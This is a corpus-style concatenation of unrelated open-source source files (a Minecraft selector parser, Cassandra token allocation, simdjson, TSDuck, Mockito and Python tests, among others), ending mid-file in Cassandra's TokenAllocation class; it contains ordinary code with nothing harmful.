throw DUPLICATE_OPTION_EXCEPTION.createWithContext(reader, optionName);
}
if (!optionName.startsWith("score_") && !SELECTOR_OPTIONS.get(optionName).isAllowed(this)) {
reader.setCursor(start);
throw DISALLOWED_OPTION_EXCEPTION.createWithContext(reader, optionName);
}
seenOptions.add(optionName);
hadExplicitOption = true;
reader.expect('=');
suggestor = SuggestionsBuilder::buildFuture;
if (optionName.startsWith("score_")) {
reader.readInt();
} else {
SELECTOR_OPTIONS.get(optionName).parse(this);
}
}
private void suggestOption() {
int start = reader.getCursor();
List<String> seenOptionsCopy = new ArrayList<>(seenOptions);
suggestor = builder -> {
SuggestionsBuilder normalOptionBuilder = builder.createOffset(start);
CommandSource.suggestMatching(SELECTOR_OPTIONS.keySet().stream()
.filter(opt -> SELECTOR_OPTIONS.get(opt).isAllowed(this))
.filter(opt -> !seenOptionsCopy.contains(opt))
.map(opt -> opt + "=")
.collect(Collectors.toSet()), normalOptionBuilder);
var normalOptions = normalOptionBuilder.buildFuture();
SuggestionsBuilder scoreOptionBuilder = builder.createOffset(start);
var scoreOptions = getScoreObjectives().thenCompose(objectives -> {
CommandSource.suggestMatching(objectives.stream()
.map(str -> "score_" + str)
.filter(str -> !seenOptionsCopy.contains(str))
.map(str -> str + "="),
scoreOptionBuilder);
CommandSource.suggestMatching(objectives.stream()
.map(str -> "score_" + str + "_min")
.filter(str -> !seenOptionsCopy.contains(str))
.map(str -> str + "="),
scoreOptionBuilder);
return scoreOptionBuilder.buildFuture();
});
return CompletableFuture.allOf(normalOptions, scoreOptions)
.thenCompose(v -> UnionArgumentType.mergeSuggestions(normalOptions.join(), scoreOptions.join()));
};
}
private CompletableFuture<List<String>> getScoreObjectives() {
return TabCompletionManager.requestCustomCompletion("/scoreboard objectives remove ");
}
private void parseInt(int min, int max) throws CommandSyntaxException {
int start = reader.getCursor();
int val = reader.readInt();
if (val < min) {
reader.setCursor(start);
throw CommandSyntaxException.BUILT_IN_EXCEPTIONS.integerTooLow().createWithContext(reader, min, val);
}
if (val > max) {
reader.setCursor(start);
throw CommandSyntaxException.BUILT_IN_EXCEPTIONS.integerTooHigh().createWithContext(reader, max, val);
}
}
private boolean parseIsInverted() {
if (reader.canRead() && reader.peek() == '!') {
reader.skip();
return true;
}
return false;
}
}
static {
SELECTOR_OPTIONS.put("r", parser -> parser.parseInt(0, Integer.MAX_VALUE));
SELECTOR_OPTIONS.put("rm", parser -> parser.parseInt(0, Integer.MAX_VALUE));
SELECTOR_OPTIONS.put("l", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
parser.playersOnly = true;
parser.typeKnown = true;
parser.parseInt(0, Integer.MAX_VALUE);
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.cannotSelectPlayers;
}
});
SELECTOR_OPTIONS.put("lm", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
parser.playersOnly = true;
parser.typeKnown = true;
parser.parseInt(0, Integer.MAX_VALUE);
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.cannotSelectPlayers;
}
});
SELECTOR_OPTIONS.put("x", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("y", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("z", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("dx", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("dy", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("dz", parser -> parser.reader.readInt());
SELECTOR_OPTIONS.put("rx", parser -> parser.parseInt(-90, 90));
SELECTOR_OPTIONS.put("rxm", parser -> parser.parseInt(-90, 90));
SELECTOR_OPTIONS.put("ry", parser -> parser.parseInt(-360, 360));
SELECTOR_OPTIONS.put("rym", parser -> parser.parseInt(-360, 360));
SELECTOR_OPTIONS.put("c", parser -> {
int start = parser.reader.getCursor();
int val = parser.reader.readInt();
boolean multiple = val != -1 && val != 1;
if (parser.singleTarget && multiple) {
parser.reader.setCursor(start);
throw NO_MULTIPLE_EXCEPTION.createWithContext(parser.reader);
}
if (!multiple)
parser.singleTarget = true;
});
SELECTOR_OPTIONS.put("m", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
int start = parser.reader.getCursor();
parser.playersOnly = true;
parser.typeKnown = true;
if (ConnectionInfo.protocolVersion <= Protocols.V1_8) {
parser.suggestor = builder -> {
builder = builder.createOffset(start);
builder.suggest(0);
builder.suggest(1);
builder.suggest(2);
builder.suggest(3);
return builder.buildFuture();
};
parser.parseInt(0, 3);
} else {
parser.suggestor = builder -> {
builder = builder.createOffset(start);
builder.suggest("creative");
builder.suggest("!creative");
builder.suggest("survival");
builder.suggest("!survival");
builder.suggest("adventure");
builder.suggest("!adventure");
builder.suggest("spectator");
builder.suggest("!spectator");
return builder.buildFuture();
};
parser.parseIsInverted();
int gamemodeStart = parser.reader.getCursor();
String gamemode = parser.reader.readUnquotedString();
switch (gamemode) {
case "c":
case "s":
case "a":
case "sp":
case "creative":
case "survival":
case "adventure":
case "spectator":
break;
default:
try {
int intMode = Integer.parseInt(gamemode);
if (intMode >= 0 && intMode <= 3) {
break;
}
} catch (NumberFormatException ignore) {
}
parser.reader.setCursor(gamemodeStart);
throw EXPECTED_GAMEMODE_EXCEPTION.createWithContext(parser.reader, gamemode);
}
}
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.cannotSelectPlayers;
}
});
SELECTOR_OPTIONS.put("team", parser -> {
int start = parser.reader.getCursor();
parser.suggestor = builder -> {
SuggestionsBuilder newBuilder = builder.createOffset(start);
return TabCompletionManager.requestCustomCompletion("/scoreboard teams remove ").thenCompose(teams -> {
CommandSource.suggestMatching(teams, newBuilder);
CommandSource.suggestMatching(teams.stream().map(str -> "!" + str), newBuilder);
return newBuilder.buildFuture();
});
};
parser.parseIsInverted();
parser.reader.readUnquotedString();
});
SELECTOR_OPTIONS.put("name", parser -> {
parser.parseIsInverted();
parser.reader.readUnquotedString();
});
SELECTOR_OPTIONS.put("type", new Option() {
@Override
public void parse(EntitySelectorParser parser) throws CommandSyntaxException {
int start = parser.reader.getCursor();
parser.suggestor = builder -> {
builder = builder.createOffset(start);
if (parser.playersOnly) {
if (ConnectionInfo.protocolVersion <= Protocols.V1_10) {
CommandSource.suggestMatching(new String[] {"Player"}, builder);
} else {
CommandSource.suggestIdentifiers(Collections.singleton(new Identifier("player")), builder);
}
} else {
if (ConnectionInfo.protocolVersion <= Protocols.V1_10) {
CommandSource.suggestMatching(Registry.ENTITY_TYPE.stream()
.filter(EntityArgumentType_1_12_2::canSelectEntityType)
.map(Protocol_1_10::getEntityId)
.filter(Objects::nonNull)
.flatMap(it -> Stream.of(it, "!" + it)),
builder);
} else {
CommandSource.suggestIdentifiers(Registry.ENTITY_TYPE.stream()
.filter(EntityArgumentType_1_12_2::canSelectEntityType)
.map(EntityType::getId),
builder);
CommandSource.suggestIdentifiers(Registry.ENTITY_TYPE.stream()
.filter(EntityArgumentType_1_12_2::canSelectEntityType)
.map(EntityType::getId)::iterator,
builder,
"!");
}
}
return builder.buildFuture();
};
boolean inverted = parser.parseIsInverted();
EntityType<?> entityType;
if (ConnectionInfo.protocolVersion <= Protocols.V1_10) {
String entityId = parser.reader.readUnquotedString();
entityType = Protocol_1_10.getEntityById(entityId);
if (entityType == null || !canSelectEntityType(entityType)) {
parser.reader.setCursor(start);
throw EntitySummonArgumentType.NOT_FOUND_EXCEPTION.createWithContext(parser.reader, entityId);
}
} else {
Identifier entityId = Identifier.fromCommandInput(parser.reader);
entityType = Registry.ENTITY_TYPE.get(entityId);
if (!Registry.ENTITY_TYPE.containsId(entityId) || !canSelectEntityType(entityType)) {
parser.reader.setCursor(start);
throw EntitySummonArgumentType.NOT_FOUND_EXCEPTION.createWithContext(parser.reader, entityId);
}
}
if (!inverted) {
parser.typeKnown = true;
if (entityType == EntityType.PLAYER) {
parser.playersOnly = true;
} else {
parser.cannotSelectPlayers = true;
}
}
if (parser.playersOnly && (!parser.typeKnown || parser.cannotSelectPlayers)) {
parser.reader.setCursor(start);
throw PLAYERS_ONLY_EXCEPTION.createWithContext(parser.reader);
}
}
@Override
public boolean isAllowed(EntitySelectorParser parser) {
return !parser.typeKnown;
}
});
SELECTOR_OPTIONS.put("tag", parser -> {
parser.parseIsInverted();
parser.reader.readUnquotedString();
});
}
private static boolean canSelectEntityType(EntityType<?> type) {
return type != EntityType.FISHING_BOBBER && type != EntityType.LIGHTNING_BOLT;
}
@FunctionalInterface
private interface Option {
void parse(EntitySelectorParser parser) throws CommandSyntaxException;
default boolean isAllowed(EntitySelectorParser parser) {
return true;
}
}
}
| 12,396 |
852 | // -*- C++ -*-
//
// Package: L1Trigger
// Class : TkMuon
#include "DataFormats/L1TCorrelator/interface/TkMuon.h"
using namespace l1t;
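// Each constructor keeps the matched L1 track (when present) and seeds the track z vertex
// from its point of closest approach.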
TkMuon::TkMuon(const LorentzVector& p4,
const edm::Ref<RegionalMuonCandBxCollection>& muRef,
const edm::Ptr<L1TTTrackType>& trackPtr,
float tkisol)
: L1Candidate(p4), muRef_(muRef), trkPtr_(trackPtr), theIsolation(tkisol), TrkzVtx_(999), quality_(999) {
if (trkPtr_.isNonnull()) {
setTrkzVtx(trkPtr()->POCA().z());
}
}
TkMuon::TkMuon(const LorentzVector& p4,
const edm::Ref<EMTFTrackCollection>& emtfRef,
const edm::Ptr<L1TTTrackType>& trackPtr,
float tkisol)
: L1Candidate(p4), emtfTrk_(emtfRef), trkPtr_(trackPtr), theIsolation(tkisol), TrkzVtx_(999), quality_(999) {
if (trkPtr_.isNonnull()) {
setTrkzVtx(trkPtr()->POCA().z());
}
}
TkMuon::TkMuon(const LorentzVector& p4, const edm::Ptr<L1TTTrackType>& trackPtr, float tkisol)
: L1Candidate(p4), trkPtr_(trackPtr), theIsolation(tkisol), TrkzVtx_(999), quality_(999) {
if (trkPtr_.isNonnull()) {
setTrkzVtx(trkPtr()->POCA().z());
}
}
| 575 |
2,053 | <gh_stars>1000+
/*
* Copyright 2015 the original author or authors.
* @https://github.com/scouter-project/scouter
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package scouter.agent.plugin;
import scouter.agent.trace.HookArgs;
import scouter.agent.trace.TraceContext;
public class PluginBackThreadTrace {
static AbstractAppService plugIn;
static {
PluginLoader.getInstance();
}
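    // Forwards service start/end events to the loaded plug-in, if any; plug-in failures
    // are swallowed so tracing never breaks the application.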
public static void start(TraceContext ctx, HookArgs hook) {
if (plugIn != null) {
try {
plugIn.start(new WrContext(ctx), hook);
} catch (Throwable t) {
}
}
}
public static void end(TraceContext ctx) {
if (plugIn != null) {
try {
plugIn.end(new WrContext(ctx));
} catch (Throwable t) {
}
}
}
}
| 417 |
615 | package org.byron4j.cookbook;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class TestCase {
static String regStr = "<[a-z]{1}>([\\u4E00-\\u9FFF]|\\w|\\W){2}</[a-z]{1}>";
static String regStrSig = "<[a-z]{1}>|</[a-z]{1}>";
public static void main(String[] args){
Pattern pattern = Pattern.compile(regStr);
String str = "总<b>公司</b>的<b>本</b>25名,分(子)<b>公司</b>s<b>本bu</b>86名<b>hello</b>你好<b>sa</b>";
Matcher match = pattern.matcher(str);
        // Holds the matched substrings with their tags stripped
List<String> list = new ArrayList<>();
boolean headFlag = false;
while( match.find() ){
System.out.println("==================");
if( !headFlag && match.start() == 0){
                // The match started at the very first character
headFlag = true;
}
String string = match.group();
System.out.println("匹配项输出:" + string);
StringBuffer stringBuffer = new StringBuffer();
for(String ele : Pattern.compile(regStrSig).split(string)){
stringBuffer.append(ele);
}
System.out.println("匹配项去除标签:" + stringBuffer.toString());
list.add(stringBuffer.toString());
}
System.out.println("=============");
for (String ele : list){
System.out.println("需要插入的内容:" + ele);
}
System.out.println("=============");
        // Text left over after splitting out the matches
String[] matchArr = pattern.split(str);
for(String ele : matchArr){
System.out.println(ele);
}
List<String> result = new ArrayList<>();
if(headFlag){
            // The match started at the first character
for( int i = 0; i < list.size() ; i++ ){
result.add(list.get(i));
result.add(matchArr[i]);
}
}else{
            // The match did not start at the first character
for( int i = 0; i < list.size() ; i++ ){
result.add(matchArr[i]);
result.add(list.get(i));
}
}
System.out.println("+++++++++++++++++++++++++");
System.out.println(result);
StringBuffer sb = new StringBuffer();
for(String ele : result){
sb.append(ele);
}
System.out.println("----------------------------------------------------------");
System.out.println("原始:" + str);
System.out.println("结果:" + sb.toString());
System.out.println("----------------------------------------------------------");
}
}
| 1,528 |
12,869 | """Identity operators
@see: https://www.w3schools.com/python/python_operators.asp
Identity operators are used to compare objects: not whether they are equal, but whether they are
actually the same object, occupying the same memory location.
"""
def test_identity_operators():
"""Identity operators"""
# Let's illustrate identity operators based on the following lists.
first_fruits_list = ["apple", "banana"]
second_fruits_list = ["apple", "banana"]
third_fruits_list = first_fruits_list
# is
# Returns true if both variables are the same object.
# Example:
# first_fruits_list and third_fruits_list are the same objects.
assert first_fruits_list is third_fruits_list
# is not
# Returns true if both variables are not the same object.
# Example:
# first_fruits_list and second_fruits_list are not the same objects, even if they have
# the same content
assert first_fruits_list is not second_fruits_list
# To demonstrate the difference between "is" and "==": this comparison returns True because
# first_fruits_list is equal to second_fruits_list.
assert first_fruits_list == second_fruits_list
| 369 |
345 | <filename>Note-6 A3CNet/Note-6.4 HS300指数增强/train.py
import multiprocessing
import threading
import tensorflow as tf
from agent.main import Access, Framework
# NUMS_CPU = multiprocessing.cpu_count()
NUMS_CPU = 1
inputs_shape = [381, 240, 58]
action_size = 3
max_episodes = 1
GD = {}
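# Workers share the single Access instance and record their per-episode scores in GD,
# keyed by worker name.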
class Worker(Framework):
def __init__(self, name, access, inputs_shape, action_size):
super().__init__(name, access, inputs_shape, action_size)
def run(self, sess, max_episodes, t_max=8):
episode_score_list = []
episode = 0
while episode < max_episodes:
episode += 1
episode_socre, _ = self.run_episode(sess, t_max)
episode_score_list.append(episode_socre)
GD[str(self.name)] = episode_score_list
if self.name == 'W0':
print('Episode: %f, score: %f' % (episode, episode_socre))
print('\n')
with tf.Session() as sess:
with tf.device("/cpu:0"):
A = Access(inputs_shape, action_size)
F_list = []
for i in range(NUMS_CPU):
F_list.append(Worker('W%i' % i, A, inputs_shape, action_size))
COORD = tf.train.Coordinator()
sess.run(tf.global_variables_initializer())
sess.graph.finalize()
threads_list = []
for ac in F_list:
job = lambda: ac.run(sess, max_episodes)
t = threading.Thread(target=job)
t.start()
threads_list.append(t)
COORD.join(threads_list)
A.save(sess, 'model/saver_1.ckpt') | 748 |
1,806 | <filename>apollo-api-impl/src/test/java/com/spotify/apollo/request/RequestHandlerImplTest.java
/*
* -\-\-
* Spotify Apollo API Implementations
* --
* Copyright (C) 2013 - 2015 Spotify AB
* --
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* -/-/-
*/
package com.spotify.apollo.request;
import com.spotify.apollo.Request;
import com.spotify.apollo.RequestContext;
import com.spotify.apollo.RequestMetadata;
import com.spotify.apollo.Response;
import com.spotify.apollo.dispatch.Endpoint;
import com.spotify.apollo.dispatch.EndpointInfo;
import com.spotify.apollo.environment.IncomingRequestAwareClient;
import com.spotify.apollo.route.Rule;
import com.spotify.apollo.route.RuleMatch;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.ArgumentCaptor;
import org.mockito.Captor;
import org.mockito.Mock;
import org.mockito.junit.MockitoJUnitRunner;
import java.time.Instant;
import java.util.Optional;
import java.util.concurrent.CompletionStage;
import java.util.function.BiConsumer;
import okio.ByteString;
import static com.spotify.apollo.Response.forStatus;
import static com.spotify.apollo.Status.INTERNAL_SERVER_ERROR;
import static org.hamcrest.Matchers.is;
import static org.junit.Assert.assertThat;
import static org.mockito.Matchers.any;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
@RunWith(MockitoJUnitRunner.class)
public class RequestHandlerImplTest {
@Mock RequestRunnableFactory requestFactory;
@Mock EndpointRunnableFactory endpointFactory;
@Mock RequestRunnable requestRunnable;
@Mock Runnable runnable;
@Mock OngoingRequest ongoingRequest;
@Mock RuleMatch<Endpoint> match;
@Mock Endpoint endpoint;
@Mock EndpointInfo info;
@Captor ArgumentCaptor<BiConsumer<OngoingRequest, RuleMatch<Endpoint>>> continuationCaptor;
@Captor ArgumentCaptor<RequestContext> requestContextCaptor;
RequestHandlerImpl requestHandler;
private RequestMetadata requestMetadata;
@Before
public void setUp() throws Exception {
IncomingRequestAwareClient client = new NoopClient();
requestMetadata = RequestMetadataImpl.create(Instant.ofEpochSecond(4711L), Optional.empty(), Optional.empty());
when(ongoingRequest.metadata()).thenReturn(requestMetadata);
when(ongoingRequest.request()).thenReturn(Request.forUri("http://foo"));
when(requestFactory.create(any())).thenReturn(requestRunnable);
when(endpointFactory.create(eq(ongoingRequest), requestContextCaptor.capture(), eq(endpoint)))
.thenReturn(runnable);
when(match.getRule()).thenReturn(Rule.fromUri("http://foo", "GET", endpoint));
requestHandler = new RequestHandlerImpl(requestFactory, endpointFactory, client);
}
@Test
public void shouldRunRequestRunnable() throws Exception {
requestHandler.handle(ongoingRequest);
verify(requestRunnable).run(any());
}
@Test
public void shouldRunEndpointRunnable() throws Exception {
requestHandler.handle(ongoingRequest);
verify(requestRunnable).run(continuationCaptor.capture());
continuationCaptor.getValue()
.accept(ongoingRequest, match);
verify(endpointFactory).create(eq(ongoingRequest), any(RequestContext.class), eq(endpoint));
verify(runnable).run();
}
@Test
public void shouldReplySafelyForExceptions() throws Exception {
doThrow(new NullPointerException("expected")).when(requestRunnable).run(any());
requestHandler.handle(ongoingRequest);
verify(ongoingRequest).reply(forStatus(INTERNAL_SERVER_ERROR));
}
@Test
public void shouldSetRequestContextMetadata() throws Exception {
requestHandler.handle(ongoingRequest);
verify(requestRunnable).run(continuationCaptor.capture());
continuationCaptor.getValue()
.accept(ongoingRequest, match);
final RequestContext requestContext = requestContextCaptor.getValue();
assertThat(requestContext.metadata(), is(requestMetadata));
}
private static class NoopClient implements IncomingRequestAwareClient {
@Override
public CompletionStage<Response<ByteString>> send(Request request, Optional<Request> incoming) {
throw new UnsupportedOperationException();
}
}
}
| 1,501 |
542 | // Sample TSDuck extension.
// Definition of the Foo Table (FOOT)
#include "fooTable.h"
// Characteristics of a FOOT
#define MY_XML_NAME u"FOOT" // XML name is <FOOT>
#define MY_CLASS foo::FooTable // Fully qualified class name
#define MY_TID foo::TID_FOOT // Table id
#define MY_STD foo::STD // DTV standards for FOOT.
// Registration of the table in TSDuck library
TS_REGISTER_TABLE(MY_CLASS, {MY_TID}, MY_STD, MY_XML_NAME, MY_CLASS::DisplaySection);
//----------------------------------------------------------------------------
// Constructors
//----------------------------------------------------------------------------
foo::FooTable::FooTable(uint16_t id_, const ts::UString name_, uint8_t version_, bool is_current_) :
AbstractLongTable(MY_TID, MY_XML_NAME, MY_STD, version_, is_current_),
foo_id(id_),
name(name_),
descs(this)
{
}
foo::FooTable::FooTable(const FooTable& other) :
AbstractLongTable(other),
foo_id(other.foo_id),
name(other.name),
descs(this, other.descs)
{
}
foo::FooTable::FooTable(ts::DuckContext& duck, const ts::BinaryTable& table) :
FooTable()
{
deserialize(duck, table);
}
//----------------------------------------------------------------------------
// Get the table id extension
//----------------------------------------------------------------------------
uint16_t foo::FooTable::tableIdExtension() const
{
// This is the field which is serialize as "table id extension" in a FOOT.
return foo_id;
}
//----------------------------------------------------------------------------
// Clear content, return to initial values
//----------------------------------------------------------------------------
void foo::FooTable::clearContent()
{
foo_id = 0;
name.clear();
descs.clear();
}
//----------------------------------------------------------------------------
// Deserialization of the payload of one section.
// The content is added to the table.
// Buffer deserialization errors or remaining data invalidate the table.
//----------------------------------------------------------------------------
void foo::FooTable::deserializePayload(ts::PSIBuffer& buf, const ts::Section& section)
{
// Get fixed part. Should be identical in all sections.
foo_id = section.tableIdExtension();
// Get name (accumulated from all sections)
name.append(buf.getStringWithByteLength());
// Add descriptors from the section.
buf.getDescriptorListWithLength(descs);
}
//----------------------------------------------------------------------------
// Serialization
//----------------------------------------------------------------------------
void foo::FooTable::serializePayload(ts::BinaryTable& table, ts::PSIBuffer& buf) const
{
size_t name_index = 0;
size_t desc_index = 0;
// Build sections until name and descriptors are all gone.
// Make sure to build at least one section.
do {
// Serialize as many characters as possible from the name.
name_index += buf.putPartialStringWithByteLength(name, name_index);
// Serialize as many descriptors as possible.
desc_index = buf.putPartialDescriptorListWithLength(descs, desc_index);
// Add this section. The payload buffer is reset on return.
addOneSection(table, buf);
} while (name_index < name.size() || desc_index < descs.size());
}
//----------------------------------------------------------------------------
// A static method to display an FOOT section.
//----------------------------------------------------------------------------
void foo::FooTable::DisplaySection(ts::TablesDisplay& disp, const ts::Section& section, ts::PSIBuffer& buf, const ts::UString& margin)
{
const uint16_t id = section.tableIdExtension();
const ts::UString name(buf.getStringWithByteLength());
disp << margin << ts::UString::Format(u"Foo id: 0x%X (%<d), name: \"%s\"", {id, name}) << std::endl;
disp.displayDescriptorListWithLength(section, buf, margin);
disp.displayExtraData(buf, margin);
}
//----------------------------------------------------------------------------
// XML serialization
//----------------------------------------------------------------------------
void foo::FooTable::buildXML(ts::DuckContext& duck, ts::xml::Element* root) const
{
root->setIntAttribute(u"version", version);
root->setBoolAttribute(u"current", is_current);
root->setIntAttribute(u"foo_id", foo_id, true);
root->setAttribute(u"name", name, true);
descs.toXML(duck, root);
}
//----------------------------------------------------------------------------
// XML deserialization
//----------------------------------------------------------------------------
bool foo::FooTable::analyzeXML(ts::DuckContext& duck, const ts::xml::Element* element)
{
return element->getIntAttribute<uint8_t>(version, u"version", false, 0, 0, 31) &&
element->getBoolAttribute(is_current, u"current", false, true) &&
element->getIntAttribute<uint16_t>(foo_id, u"foo_id", true) &&
element->getAttribute(name, u"name") &&
descs.fromXML(duck, element);
}
| 1,511 |
9,541 | <reponame>mkleshchenok/simdjson
#pragma once
#include "runner_base.h"
#include "simdjson.h"
namespace json_benchmark {
template<typename I>
struct string_runner : public runner_base<I> {
const simdjson::padded_string &original_json;
simdjson::padded_string json;
string_runner(const simdjson::padded_string &_json) : original_json{_json}, json(original_json.data(), original_json.size()) {}
simdjson_warn_unused bool before_run(benchmark::State &state) {
if (!runner_base<I>::after_run(state)) { return false; };
// Copy the original json in case we did *in situ*
std::memcpy(json.data(), original_json.data(), original_json.size());
return true;
}
/** Get the total number of bytes processed in each iteration. Used for metrics like bytes/second. */
size_t bytes_per_iteration() {
return json.size();
}
/** Get the total number of documents processed in each iteration. Used for metrics like documents/second. */
size_t documents_per_iteration() {
return 1;
}
/** Get the total number of items processed in each iteration. Used for metrics like items/second. */
size_t items_per_iteration() {
return 1;
}
};
} // namespace json_benchmark | 393 |
13,057 | <filename>src/test/java/org/mockito/InvocationFactoryTest.java<gh_stars>1000+
/*
* Copyright (c) 2018 Mockito contributors
* This program is made available under the terms of the MIT License.
*/
package org.mockito;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.withSettings;
import org.junit.Test;
import org.mockito.invocation.Invocation;
import org.mockito.invocation.InvocationFactory;
import org.mockitoutil.TestBase;
public class InvocationFactoryTest extends TestBase {
static class TestClass {
public String testMethod() throws Throwable {
return "un-mocked";
}
}
final TestClass mock = spy(TestClass.class);
@Test
public void call_method_that_throws_a_throwable() throws Throwable {
Invocation invocation =
Mockito.framework()
.getInvocationFactory()
.createInvocation(
mock,
withSettings().build(TestClass.class),
TestClass.class.getDeclaredMethod("testMethod"),
new InvocationFactory.RealMethodBehavior() {
@Override
public Object call() throws Throwable {
throw new Throwable("mocked");
}
});
try {
Mockito.mockingDetails(mock).getMockHandler().handle(invocation);
} catch (Throwable t) {
assertEquals("mocked", t.getMessage());
return;
}
fail();
}
@Test
public void call_method_that_returns_a_string() throws Throwable {
Invocation invocation =
Mockito.framework()
.getInvocationFactory()
.createInvocation(
mock,
withSettings().build(TestClass.class),
TestClass.class.getDeclaredMethod("testMethod"),
new InvocationFactory.RealMethodBehavior() {
@Override
public Object call() throws Throwable {
return "mocked";
}
});
Object ret = Mockito.mockingDetails(mock).getMockHandler().handle(invocation);
assertEquals("mocked", ret);
}
}
| 1,409 |
6,210 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.cassandra.dht.tokenallocator;
import java.util.Collection;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.NavigableMap;
import java.util.TreeMap;
import com.google.common.collect.Lists;
import com.google.common.collect.Maps;
import org.apache.commons.math3.stat.descriptive.SummaryStatistics;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.cassandra.config.DatabaseDescriptor;
import org.apache.cassandra.dht.Token;
import org.apache.cassandra.exceptions.ConfigurationException;
import org.apache.cassandra.locator.AbstractReplicationStrategy;
import org.apache.cassandra.locator.IEndpointSnitch;
import org.apache.cassandra.locator.InetAddressAndPort;
import org.apache.cassandra.locator.NetworkTopologyStrategy;
import org.apache.cassandra.locator.SimpleStrategy;
import org.apache.cassandra.locator.TokenMetadata;
import org.apache.cassandra.locator.TokenMetadata.Topology;
public class TokenAllocation
{
public static final double WARN_STDEV_GROWTH = 0.05;
private static final Logger logger = LoggerFactory.getLogger(TokenAllocation.class);
final TokenMetadata tokenMetadata;
final AbstractReplicationStrategy replicationStrategy;
final int numTokens;
final Map<String, Map<String, StrategyAdapter>> strategyByRackDc = new HashMap<>();
private TokenAllocation(TokenMetadata tokenMetadata, AbstractReplicationStrategy replicationStrategy, int numTokens)
{
this.tokenMetadata = tokenMetadata.cloneOnlyTokenMap();
this.replicationStrategy = replicationStrategy;
this.numTokens = numTokens;
}
public static Collection<Token> allocateTokens(final TokenMetadata tokenMetadata,
final AbstractReplicationStrategy rs,
final InetAddressAndPort endpoint,
int numTokens)
{
return create(tokenMetadata, rs, numTokens).allocate(endpoint);
}
public static Collection<Token> allocateTokens(final TokenMetadata tokenMetadata,
final int replicas,
final InetAddressAndPort endpoint,
int numTokens)
{
return create(DatabaseDescriptor.getEndpointSnitch(), tokenMetadata, replicas, numTokens).allocate(endpoint);
}
static TokenAllocation create(IEndpointSnitch snitch, TokenMetadata tokenMetadata, int replicas, int numTokens)
{
// We create a fake NTS replication strategy with the specified RF in the local DC
HashMap<String, String> options = new HashMap<>();
options.put(snitch.getLocalDatacenter(), Integer.toString(replicas));
NetworkTopologyStrategy fakeReplicationStrategy = new NetworkTopologyStrategy(null, tokenMetadata, snitch, options);
TokenAllocation allocator = new TokenAllocation(tokenMetadata, fakeReplicationStrategy, numTokens);
return allocator;
}
static TokenAllocation create(TokenMetadata tokenMetadata, AbstractReplicationStrategy rs, int numTokens)
{
return new TokenAllocation(tokenMetadata, rs, numTokens);
}
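    // Picks numTokens new tokens for the endpoint, resolves cross-datacenter clashes, and warns if the ownership standard deviation grows past WARN_STDEV_GROWTH.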
Collection<Token> allocate(InetAddressAndPort endpoint)
{
StrategyAdapter strategy = getOrCreateStrategy(endpoint);
Collection<Token> tokens = strategy.createAllocator().addUnit(endpoint, numTokens);
tokens = strategy.adjustForCrossDatacenterClashes(tokens);
SummaryStatistics os = strategy.replicatedOwnershipStats();
tokenMetadata.updateNormalTokens(tokens, endpoint);
SummaryStatistics ns = strategy.replicatedOwnershipStats();
logger.info("Selected tokens {}", tokens);
logger.debug("Replicated node load in datacenter before allocation {}", statToString(os));
logger.debug("Replicated node load in datacenter after allocation {}", statToString(ns));
double stdDevGrowth = ns.getStandardDeviation() - os.getStandardDeviation();
if (stdDevGrowth > TokenAllocation.WARN_STDEV_GROWTH)
{
logger.warn(String.format("Growth of %.2f%% in token ownership standard deviation after allocation above warning threshold of %d%%",
stdDevGrowth * 100, (int)(TokenAllocation.WARN_STDEV_GROWTH * 100)));
}
return tokens;
}
static String statToString(SummaryStatistics stat)
{
return String.format("max %.2f min %.2f stddev %.4f", stat.getMax() / stat.getMean(), stat.getMin() / stat.getMean(), stat.getStandardDeviation());
}
SummaryStatistics getAllocationRingOwnership(String datacenter, String rack)
{
return getOrCreateStrategy(datacenter, rack).replicatedOwnershipStats();
}
SummaryStatistics getAllocationRingOwnership(InetAddressAndPort endpoint)
{
return getOrCreateStrategy(endpoint).replicatedOwnershipStats();
}
abstract class StrategyAdapter implements ReplicationStrategy<InetAddressAndPort>
{
// return true iff the provided endpoint occurs in the same virtual token-ring we are allocating for
// i.e. the set of the nodes that share ownership with the node we are allocating
